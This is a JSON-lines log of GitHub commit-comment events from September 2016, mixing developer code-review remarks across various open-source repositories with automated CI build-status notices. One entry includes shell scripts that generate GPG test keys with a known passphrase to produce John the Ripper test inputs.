{"id":"4573548373","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052743,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T11:35:07Z","updated_at":"2016-09-16T11:35:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1019](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13420&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 215, ignored: 3 Build time: 00:07:52\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-16T11:35:07Z"}
{"id":"4573550943","type":"CommitCommentEvent","actor":{"login":"dziedrius"},"repo":{"name":"NSwag/NSwag"},"payload":{"comment":{"id":19052749,"position":96,"line":267,"path":"src/NSwag.Integration.ClientPCL/ServiceClients.cs","commit_id":"aa33130d3b16affc5db3a3568046e617b87a497d","created_at":"2016-09-16T11:35:46Z","updated_at":"2016-09-16T11:35:46Z","body":"empty else"}},"created_at":"2016-09-16T11:35:46Z"}
{"id":"4573551175","type":"CommitCommentEvent","actor":{"login":"tolyo"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19052750,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T11:35:50Z","updated_at":"2016-09-16T11:35:50Z","body":"@franbenz Its configured to `warnOnly`, which you are free to change."}},"created_at":"2016-09-16T11:35:50Z"}
{"id":"4573559378","type":"CommitCommentEvent","actor":{"login":"franbenz"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19052777,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T11:38:06Z","updated_at":"2016-09-16T11:38:06Z","body":"Thanks @tolyo"}},"created_at":"2016-09-16T11:38:06Z"}
{"id":"4573560790","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052781,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T11:38:27Z","updated_at":"2016-09-16T11:38:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1020](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13421&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T11:38:27Z"}
{"id":"4573563488","type":"CommitCommentEvent","actor":{"login":"funkey"},"repo":{"name":"TuragaLab/PyGreentea"},"payload":{"comment":{"id":19052789,"position":4,"line":66,"path":"data_io/dataset_reading.py","commit_id":"50be17ebcbee787ac87555fcb25db6aa8a52d2e9","created_at":"2016-09-16T11:39:11Z","updated_at":"2016-09-16T11:39:11Z","body":"Right.\r\n\r\nSo I guess we should have two paths, one for the case that a mask was given, one for the case that it was generated from the components."}},"created_at":"2016-09-16T11:39:11Z"}
{"id":"4573567804","type":"CommitCommentEvent","actor":{"login":"ramonornela"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19052794,"position":null,"line":null,"path":null,"commit_id":"7c05d0c0ba7cff42e358d9648b1a7eb255d7aa37","created_at":"2016-09-16T11:40:18Z","updated_at":"2016-09-16T11:40:18Z","body":"Very nice new feature ;)"}},"created_at":"2016-09-16T11:40:18Z"}
{"id":"4573579295","type":"CommitCommentEvent","actor":{"login":"rsuter"},"repo":{"name":"NSwag/NSwag"},"payload":{"comment":{"id":19052816,"position":96,"line":267,"path":"src/NSwag.Integration.ClientPCL/ServiceClients.cs","commit_id":"aa33130d3b16affc5db3a3568046e617b87a497d","created_at":"2016-09-16T11:43:19Z","updated_at":"2016-09-16T11:43:19Z","body":"Yes, it is not very nice, but optimized away by the compiler... ok for now"}},"created_at":"2016-09-16T11:43:19Z"}
{"id":"4573581079","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19052822,"position":25,"line":59,"path":"src/main/kotlin/org/rust/lang/core/symbols/RustPath.kt","commit_id":"0095b8974f0a74ebcc7a675fb9fbdae0cdbe6e10","created_at":"2016-09-16T11:43:48Z","updated_at":"2016-09-16T11:43:48Z","body":"Why? Companion object is a perfect candidate for a factory, and using typed factories is more consistent and allows for nice APIs like `.nullable()`.\r\n\r\nAnother option is to create a dedicated\r\n\r\n```\r\nclass PatSegment {\r\n    object Externalizer: DataExternalizer<PathSegment> { ... }\r\n    companion object { ... }\r\n}\r\n``` \r\n\r\nbut I think it's just boilerplate...\r\n\r\nSidenote: implementing a dedicate externalizer for `PathSegment` does not worth it while it has only `name`, but I want to add `genericArguments` shortly."}},"created_at":"2016-09-16T11:43:48Z"}
{"id":"4573581235","type":"CommitCommentEvent","actor":{"login":"arthurpumpa"},"repo":{"name":"f0zze/rosemary-ui"},"payload":{"comment":{"id":19052823,"position":74,"line":230,"path":"src/components/datepicker/DateRangePicker.js","commit_id":"3fd450ea1bdff2438ca27bfb23a73b60d44b5c72","created_at":"2016-09-16T11:43:51Z","updated_at":"2016-09-16T11:43:51Z","body":"I would always call this.props.onPopupStateChange"}},"created_at":"2016-09-16T11:43:51Z"}
{"id":"4573583603","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"anael-seghezzi/CToy"},"payload":{"comment":{"id":19052830,"position":null,"line":null,"path":null,"commit_id":"4690573d91ac28fe0f60907be5ce8daaae99c50c","created_at":"2016-09-16T11:44:29Z","updated_at":"2016-09-16T11:44:29Z","body":"I find the meaning of the commit title confusing (because of the first word?). Can it become a bit clearer?"}},"created_at":"2016-09-16T11:44:29Z"}
{"id":"4573585405","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19052834,"position":null,"line":null,"path":null,"commit_id":"61d3d4b6eae63fc9885e20aae3170b3181452226","created_at":"2016-09-16T11:44:58Z","updated_at":"2016-09-16T11:44:58Z","body":"TeamCity Todo :: Build [Build 104](http://109.103.226.38:8512/viewLog.html?buildId=38499&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-16T11:44:58Z"}
{"id":"4573586613","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19052838,"position":null,"line":null,"path":null,"commit_id":"61d3d4b6eae63fc9885e20aae3170b3181452226","created_at":"2016-09-16T11:45:16Z","updated_at":"2016-09-16T11:45:16Z","body":"TeamCity Todo :: Build [Build 104](http://109.103.226.38:8512/viewLog.html?buildId=38499&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 25 Build time: 00:00:08"}},"created_at":"2016-09-16T11:45:16Z"}
{"id":"4573588341","type":"CommitCommentEvent","actor":{"login":"Pip3r4o"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19052841,"position":403,"line":222,"path":"runtime/src/main/java/com/tns/Runtime.java","commit_id":"90b76f9a182b5eea47394bfbf4b3e1b3878baa50","created_at":"2016-09-16T11:45:43Z","updated_at":"2016-09-16T11:45:43Z","body":"Handler will be initialized, but no connection with the main would have been established while the thread is being setup. A call to worker.postMessage will undoubtedly execute quicker than spawning a new thread, setting up a new runtime (v8 and stuff), and sending a message back to the main, to `handshake` the handlers. \r\n\r\nI can lower the resend interval to something more sensible, like 100-200ms, but I don't think that what you are suggesting is going to work the way you want it to."}},"created_at":"2016-09-16T11:45:43Z"}
{"id":"4573588346","type":"CommitCommentEvent","actor":{"login":"peterwang1996"},"repo":{"name":"hellogoing/Hello-World"},"payload":{"comment":{"id":19052842,"position":null,"line":null,"path":null,"commit_id":"46d8c717f89f92d4d025bbe0e4899723becbb552","created_at":"2016-09-16T11:45:43Z","updated_at":"2016-09-16T11:45:43Z","body":"话说这样的东西真的能在浏览器里面看么。。。"}},"created_at":"2016-09-16T11:45:43Z"}
{"id":"4573589099","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052844,"position":null,"line":null,"path":null,"commit_id":"52d95b3d8a797b8af68a7fa908eb09ee679a5d2e","created_at":"2016-09-16T11:45:55Z","updated_at":"2016-09-16T11:45:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1020](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13421&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 215, ignored: 3 Build time: 00:07:28\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-16T11:45:55Z"}
{"id":"4573590832","type":"CommitCommentEvent","actor":{"login":"vliedel"},"repo":{"name":"crownstone/bluenet"},"payload":{"comment":{"id":19052848,"position":null,"line":null,"path":null,"commit_id":"a9029b8548b9ca680b622b6b0498f07f00ab336c","created_at":"2016-09-16T11:46:23Z","updated_at":"2016-09-16T11:46:23Z","body":"Did you check this?"}},"created_at":"2016-09-16T11:46:23Z"}
{"id":"4573591638","type":"CommitCommentEvent","actor":{"login":"andcastillo"},"repo":{"name":"cheminfo/nmr-metadata"},"payload":{"comment":{"id":19052850,"position":null,"line":null,"path":null,"commit_id":"655fb0f1f055193a8107cbdb672d5ebdc1e0a73c","created_at":"2016-09-16T11:46:35Z","updated_at":"2016-09-16T11:46:35Z","body":"Yes. I need a new version."}},"created_at":"2016-09-16T11:46:35Z"}
{"id":"4573594820","type":"CommitCommentEvent","actor":{"login":"yeshwanthvshenoy"},"repo":{"name":"mschwarzmueller/laravel53-changes"},"payload":{"comment":{"id":19052856,"position":null,"line":null,"path":null,"commit_id":"2e62863292ef0b6da336cff4e99249e3827247d7","created_at":"2016-09-16T11:47:25Z","updated_at":"2016-09-16T11:47:25Z","body":"@mschwarzmueller How do we protect routes in Laravel 5.3? Kindly help me with [this issue] (http://stackoverflow.com/questions/39508556/issue-with-route-protection-in-laravel-5-3). You can browse through my project [here] (https://github.com/yeshwanthvshenoy/De-Bug)."}},"created_at":"2016-09-16T11:47:25Z"}
{"id":"4573602383","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19052878,"position":5,"line":174,"path":"UM/Settings/Models/SettingPropertyProvider.py","commit_id":"5a35c6a080e98cc32ff8b88fb07cb8da6c2039b8","created_at":"2016-09-16T11:49:28Z","updated_at":"2016-09-16T11:49:28Z","body":"`\"resolve\"` property is not defined in Uranium."}},"created_at":"2016-09-16T11:49:28Z"}
{"id":"4573603811","type":"CommitCommentEvent","actor":{"login":"rosenpin"},"repo":{"name":"rosenpin/AlwaysOnDisplayAmoled"},"payload":{"comment":{"id":19052882,"position":null,"line":null,"path":null,"commit_id":"75fc0b61ffc9ce430a8defa2533cddb25cad0acb","created_at":"2016-09-16T11:49:49Z","updated_at":"2016-09-16T11:49:49Z","body":"#614 "}},"created_at":"2016-09-16T11:49:49Z"}
{"id":"4573604420","type":"CommitCommentEvent","actor":{"login":"Coquinoo"},"repo":{"name":"Coquinoo/hackinscience"},"payload":{"comment":{"id":19052884,"position":3,"line":3,"path":"README.md","commit_id":"41ec21e6d4f76b4bc0893a864f26827b8056f84c","created_at":"2016-09-16T11:49:58Z","updated_at":"2016-09-16T11:49:58Z","body":"?"}},"created_at":"2016-09-16T11:49:58Z"}
{"id":"4573609719","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19052896,"position":null,"line":null,"path":null,"commit_id":"b0080a78b12cb21f75d1a1e115a21f7c204ca900","created_at":"2016-09-16T11:51:22Z","updated_at":"2016-09-16T11:51:22Z","body":"Java构造器的加载顺序"}},"created_at":"2016-09-16T11:51:22Z"}
{"id":"4573609943","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19052898,"position":null,"line":null,"path":null,"commit_id":"c990c5d67e10939b8e85b95e46ea00b7227c5e40","created_at":"2016-09-16T11:51:26Z","updated_at":"2016-09-16T11:51:26Z","body":"这个和 gitignore 有什么关系……"}},"created_at":"2016-09-16T11:51:26Z"}
{"id":"4573612479","type":"CommitCommentEvent","actor":{"login":"murrant"},"repo":{"name":"librenms/librenms"},"payload":{"comment":{"id":19052908,"position":null,"line":null,"path":null,"commit_id":"8c5ff4609b31eb4864c7112bbc90381dc857e03d","created_at":"2016-09-16T11:52:06Z","updated_at":"2016-09-16T11:52:06Z","body":"Fun, this can be called from ./ or html/ and the code depends on that..."}},"created_at":"2016-09-16T11:52:06Z"}
{"id":"4573612757","type":"CommitCommentEvent","actor":{"login":"fyvfyv"},"repo":{"name":"htmlacademy-adaptive/207822-sedona"},"payload":{"comment":{"id":19052911,"position":5,"line":8,"path":"sass/blocks/feature.scss","commit_id":"420be708621f2ff310a10a4375223d9d5e4c94b6","created_at":"2016-09-16T11:52:10Z","updated_at":"2016-09-16T11:52:10Z","body":"Не-не-не. Это же уже отдельный селектор. Нужно `feature` закрыть. А то у тебя каскад получается ненужный"}},"created_at":"2016-09-16T11:52:10Z"}
{"id":"4573615340","type":"CommitCommentEvent","actor":{"login":"mikepauer"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19052915,"position":null,"line":null,"path":null,"commit_id":"c247160a5fa6028d02adbc0dab506cd45564eede","created_at":"2016-09-16T11:52:50Z","updated_at":"2016-09-16T11:52:50Z","body":"This commit from what I can see effectively doubles the memory needed as quest data is now stored twice and never removed when it's no longer needed. using LUABrowser while ingame confirms this.\r\n\r\nI also purposely had no message about when sorting started as I don't want chat to be spammed. As I said when I posted the original commit this is entirely experimental, and if too many bugs / problems are being found i'm going to go back to the old loading and just remove / fix the 110 iterations loop that caused the stalling."}},"created_at":"2016-09-16T11:52:50Z"}
{"id":"4573618558","type":"CommitCommentEvent","actor":{"login":"mkaput"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19052924,"position":25,"line":59,"path":"src/main/kotlin/org/rust/lang/core/symbols/RustPath.kt","commit_id":"0095b8974f0a74ebcc7a675fb9fbdae0cdbe6e10","created_at":"2016-09-16T11:53:41Z","updated_at":"2016-09-16T11:53:41Z","body":"I got your reasons, but I don't see `DataExternalizer` as a factory, rather some kind of serializer which isn't such perfect candidate as former pattern.\r\n\r\nI believe this can make a risk of implementing multiple interfaces for general-purpose object which will be very bad. So personally, I'd choose boilerplate in this situation to avoid confusing API. And it looks more readable to me imho :wink: "}},"created_at":"2016-09-16T11:53:41Z"}
{"id":"4573622401","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19052937,"position":null,"line":null,"path":null,"commit_id":"9540096be84f079c37088a2271baf7b2194c44cb","created_at":"2016-09-16T11:54:42Z","updated_at":"2016-09-16T11:54:42Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/488/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-16T11:54:42Z"}
{"id":"4573626005","type":"CommitCommentEvent","actor":{"login":"AireenYe"},"repo":{"name":"AireenYe/AireenYe.github.io"},"payload":{"comment":{"id":19052944,"position":38,"line":38,"path":"index.html","commit_id":"46b8b498d862e3eaf174a70db1863984f1b2f1fc","created_at":"2016-09-16T11:55:37Z","updated_at":"2016-09-16T11:55:37Z","body":"<br />"}},"created_at":"2016-09-16T11:55:37Z"}
{"id":"4573638095","type":"CommitCommentEvent","actor":{"login":"sthalik"},"repo":{"name":"opentrack/opentrack"},"payload":{"comment":{"id":19052970,"position":null,"line":null,"path":null,"commit_id":"dec625e51878c9167100837086f82fb0f78b0189","created_at":"2016-09-16T11:58:53Z","updated_at":"2016-09-16T11:58:53Z","body":"@DaMichel so was I. It's already done but needs to be split into logical commits."}},"created_at":"2016-09-16T11:58:53Z"}
{"id":"4573640011","type":"CommitCommentEvent","actor":{"login":"AlexPeshkoff"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19052975,"position":null,"line":null,"path":null,"commit_id":"42454158b712cfd3ba063e1edc1f7172693f18c8","created_at":"2016-09-16T11:59:23Z","updated_at":"2016-09-16T11:59:23Z","body":"On 16.09.2016 14:30, Adriano dos Santos Fernandes wrote:\n> In what condition catchException is called with NULL status?\n>\n\n#0  0x00007fdd2de4b978 in Firebird::IStatus::setErrors (this=0x0, \nvalue=0x7fdd2f33bca0)\n     at /usr/home/firebird/HEAD/src/include/firebird/IdlFbInterfaces.h:261\n#1  0x00007fdd2de510a6 in \nFirebird::BaseStatusWrapper<Firebird::CheckStatusWrapper>::catchException \n(status=0x0)\n     at /usr/home/firebird/HEAD/src/include/firebird/Interface.h:121\n#2  0x00007fdd2e04ef66 in \nFirebird::ITimerBaseImpl<Jrd::Database::Linger, \nFirebird::CheckStatusWrapper, \nFirebird::IReferenceCountedImpl<Jrd::Database::Linger, \nFirebird::CheckStatusWrapper, \nFirebird::Inherit<Firebird::IVersionedImpl<Jrd::Database::Linger, \nFirebird::CheckStatusWrapper, Firebird::Inherit<Firebird::ITimer> > > > \n >::cloophandlerDispatcher (self=0x7fdd31cf31e0)\n     at /usr/home/firebird/HEAD/src/include/firebird/IdlFbInterfaces.h:12332\n#3  0x00007fdd317051f7 in Firebird::ITimer::handler \n(this=0x7fdd31cf31e0) at \n/usr/home/firebird/HEAD/src/include/firebird/IdlFbInterfaces.h:3433\n#4  0x00007fdd31703c07 in Why::(anonymous \nnamespace)::TimerEntry::timeThread ()\n     at /usr/home/firebird/HEAD/src/yvalve/MasterImplementation.cpp:286\n#5  0x00007fdd317eb428 in (anonymous namespace)::ThreadArgs::run \n(this=0x7fdd2f33be00) at \n/usr/home/firebird/HEAD/src/common/ThreadStart.cpp:78\n#6  0x00007fdd317eb4ce in (anonymous namespace)::threadStart \n(arg=0x7fdd31dc7a50) at \n/usr/home/firebird/HEAD/src/common/ThreadStart.cpp:93\n#7  0x00007fdd305fd494 in start_thread () from /lib64/libpthread.so.0\n\nIt was\n\n117                                     ISC_STATUS statusVector[] = {\n118                                             isc_arg_gds, isc_random,\n119                                             isc_arg_string, \n(ISC_STATUS) \"Unrecognized C++ exception\",\n120                                             isc_arg_end};\n121 status->setErrors(statusVector);\n\nThe process was going to close abnormally.\n\n\n"}},"created_at":"2016-09-16T11:59:23Z"}
{"id":"4573640612","type":"CommitCommentEvent","actor":{"login":"sthalik"},"repo":{"name":"opentrack/opentrack"},"payload":{"comment":{"id":19052978,"position":null,"line":null,"path":null,"commit_id":"dec625e51878c9167100837086f82fb0f78b0189","created_at":"2016-09-16T11:59:34Z","updated_at":"2016-09-16T11:59:34Z","body":"@DaMichel I wrote standalone code accessing the dialog and didn't work for ps3 eye. Also a third-party dshow filter browser program doesn't work for ps3 eye."}},"created_at":"2016-09-16T11:59:34Z"}
{"id":"4573642553","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19052989,"position":null,"line":null,"path":null,"commit_id":"f179f0bea2f33fe2f3ba7b91e767fd76e40a7303","created_at":"2016-09-16T12:00:09Z","updated_at":"2016-09-16T12:00:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 57](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13422&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-16T12:00:09Z"}
{"id":"4573648738","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19053003,"position":null,"line":null,"path":null,"commit_id":"f179f0bea2f33fe2f3ba7b91e767fd76e40a7303","created_at":"2016-09-16T12:01:39Z","updated_at":"2016-09-16T12:01:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 57](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13422&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:30"}},"created_at":"2016-09-16T12:01:39Z"}
{"id":"4573652436","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19053012,"position":null,"line":null,"path":null,"commit_id":"b3726500b30e018955997c0919a9ac8ea7126fef","created_at":"2016-09-16T12:02:33Z","updated_at":"2016-09-16T12:02:33Z","body":"Here is the code I whipped up to get all sizes.  If I am missing something, please speak up:\r\n\r\n```sh\r\n#!/bin/sh\r\n#\r\n#   gpgmk shell script. Calls gpgmk2 many times, to create the john input files\r\n#\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c rsa 4096 $h ; done ; done\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c dsa 3072 $h ; done ; done\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c dsa 3072 $h elg-e ; done ; done\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c rsa 2048 $h ; done ; done\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c dsa 2048 $h ; done ; done\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c dsa 2048 $h elg-e ; done ; done\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c rsa 1024 $h ; done ; done\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c dsa 1024 $h ; done ; done\r\nfor h in sha1 sha224 sha256 sha384 sha512 md5 ripemd160 ; do for c in idea 3des cast5 blowfish aes aes192 aes256 twofish camellia128 camellia192 camellia256 ; do ./gpgmk2 $c dsa 1024 $h elg-e ; done ; done\r\n```\r\n\r\n\r\n```sh\r\n#!/bin/sh\r\n#\r\n# gpgmk2: builds a private key, using passed in values (first 4 must be passed in)\r\n#\r\n#  usage:  ./gpgmk2 crypt_algo key_type key_bits hash_algo [subkey_type [subkey_bits]]\r\n#\r\n#     crypt_algo:  in:     idea, 3des, cast5, blowfish, aes, aes192, aes256, twofish, camellia128, camellia192, camellia256\r\n#     hash_algo:   in:     sha1, sha224, sha256, sha384, sha512, md5, ripemd160\r\n#     key_type:    either: rsa or dsa  (each have different max key_bits)\r\n#     key_bits:    must be within valid rsa or dsa limits\r\n#     subkey type and bits will be made same as keytype/bits if not provided on command line.\r\n#\r\n# configurable infomration to put into the keys.\r\nexport NAME=userX\r\nexport EMAIL=userX@openwall.net\r\nexport COMMENT=\"1234 is the passphrase\"\r\nexport PASS=1234\r\n\r\n# compute optional params\r\nexport SKT=$5\r\nexport SKB=$6\r\nif [ x$5 == \"x\" ] ; then SKT=$2 ; fi\r\nif [ x$6 == \"x\" ] ; then SKB=$3 ; fi\r\necho \"skt=$SKT skb=$SKB\"\r\n\r\ncat >foo <<EOF\r\nKey-Type: $2\r\nKey-Length: $3\r\nSubkey-Type: $SKT\r\nSubkey-Length: $SKB\r\nName-Real: $NAME\r\nName-Comment: $COMMENT\r\nName-Email: $EMAIL\r\nExpire-Date: 0\r\nPassphrase: $PASS\r\n%pubring ./foo.pub\r\n%secring ./foo.sec\r\n%commit\r\n%echo done with --gen-key\r\nEOF\r\n\r\ngpg  --s2k-cipher-algo $1 --s2k-digest-algo $4 --simple-sk-checksum --batch --gen-key foo\r\n../run/gpg2john -d -S foo.sec >> gpg.in\r\nrm foo.pub\r\nrm foo.sec\r\ngpg  --s2k-cipher-algo $1 --s2k-digest-algo $4 --batch --gen-key foo\r\n../run/gpg2john -d -S foo.sec >> gpg.in\r\nrm foo.pub\r\nrm foo.sec\r\n```"}},"created_at":"2016-09-16T12:02:33Z"}
{"id":"4573655614","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19053028,"position":null,"line":null,"path":null,"commit_id":"c990c5d67e10939b8e85b95e46ea00b7227c5e40","created_at":"2016-09-16T12:03:24Z","updated_at":"2016-09-16T12:03:24Z","body":"我是把lilac当成通用的project看的\r\n我觉得里面都应该是通用的文件\r\nconfig.ini这种特化的文件没必要放吧，避免有被改的情况"}},"created_at":"2016-09-16T12:03:24Z"}
{"id":"4573657729","type":"CommitCommentEvent","actor":{"login":"dcposch"},"repo":{"name":"feross/webtorrent-desktop"},"payload":{"comment":{"id":19053030,"position":null,"line":null,"path":null,"commit_id":"fa67f9b82b73992304f14a9f2d07b3aab20d0ae4","created_at":"2016-09-16T12:03:57Z","updated_at":"2016-09-16T12:03:57Z","body":"@feross I forgot to make a PR for v0.15.0. Here's the changelog, and here are the other commits:\r\n\r\nhttps://github.com/feross/webtorrent-desktop/commit/39acd0bd473e32f660a0acc13fd6caa001e9999a\r\n\r\nhttps://github.com/feross/webtorrent-desktop/commit/c549fcfc274ea8cd9fffd9daf43e002c5b181695\r\n\r\nhttps://github.com/feross/webtorrent-desktop/commit/45e838d4c3b0acc21e882fe02099440ed49a5fa5"}},"created_at":"2016-09-16T12:03:57Z"}
{"id":"4573658854","type":"CommitCommentEvent","actor":{"login":"titaschanda"},"repo":{"name":"vasekp/QIClib"},"payload":{"comment":{"id":19053034,"position":null,"line":null,"path":null,"commit_id":"7798d57507c166b964ac41ce14d7bf64b71573ea","created_at":"2016-09-16T12:04:14Z","updated_at":"2016-09-16T12:04:14Z","body":"I merged your changes to master as well as to devel branch. Also you can check the devel branch, there are several new functions added (check changes file), and some API's are modified to a better version. And also it will be great if you make suggestions and comments towards QIClib."}},"created_at":"2016-09-16T12:04:14Z"}
{"id":"4573660350","type":"CommitCommentEvent","actor":{"login":"umeshpal04"},"repo":{"name":"umeshpal04/truck"},"payload":{"comment":{"id":19053039,"position":null,"line":null,"path":null,"commit_id":"acba8347e42d872408794149f1eb803a61ae877e","created_at":"2016-09-16T12:04:37Z","updated_at":"2016-09-16T12:04:37Z","body":"gud very shabhase tum hi kr skte hi assa kam ku u are same"}},"created_at":"2016-09-16T12:04:37Z"}
{"id":"4573668570","type":"CommitCommentEvent","actor":{"login":"alexfelipe"},"repo":{"name":"marcelooliveira/alura-linq"},"payload":{"comment":{"id":19053066,"position":100,"line":95,"path":"AluraLinq.Console/Problemas/16. calcular valor total de vendas de músicas do led zeppelin, por álbum/Problema16.cs","commit_id":"6e70ab03c05ff3c1504cb7d7a2f35b46128edc43","created_at":"2016-09-16T12:06:45Z","updated_at":"2016-09-16T12:06:45Z","body":"Veja que você diz que quer mostrar os albuns mais vendidos, porém, o que é ser mais vendido? é ter a maior soma de acordo com a quantidade * preço, ou ter a maior quantidade? No meu ponto de vista, independentemente de quanto isso gerou de receita, se um teve uma quantidade maior que o outro, eu entendo que ele vendeu mais. Agora se o propósito é ordernar por receita, aí acho que tá ok. O que acha?\r\n"}},"created_at":"2016-09-16T12:06:45Z"}
{"id":"4573671100","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19053072,"position":null,"line":null,"path":null,"commit_id":"c247160a5fa6028d02adbc0dab506cd45564eede","created_at":"2016-09-16T12:07:26Z","updated_at":"2016-09-16T12:07:26Z","body":"Im no expert in LUA but defining local variable in function sould be removed when function ends... But i can be wrong...\r\n\r\nExample:\r\n\r\n> function Nx.ModQuests:Load0()\r\n> \tlocal ModQuests = Nx.ModQuests:Data0()\r\n> \tlocal count = 0\r\n> \tfor key,val in pairs(ModQuests) do\r\n> \t\tNx.Quests[key] = val\r\n> \t\tcount = count + 1\r\n> \tend\r\n> \tModQuests = {}\r\n> \treturn count\r\n> end\r\n\r\nFunction Nx.ModQuests:Data0 loads data into local variable ModQuests then its parsed to Nx.Quests and just to be assured im clearing local ModQuest variable... So i dont know where its storing it twice? But is i said im no expert in LUA. Please correct me if im wrong Rythal.\r\n\r\nAs to message to chat i can be easly commented :)"}},"created_at":"2016-09-16T12:07:26Z"}
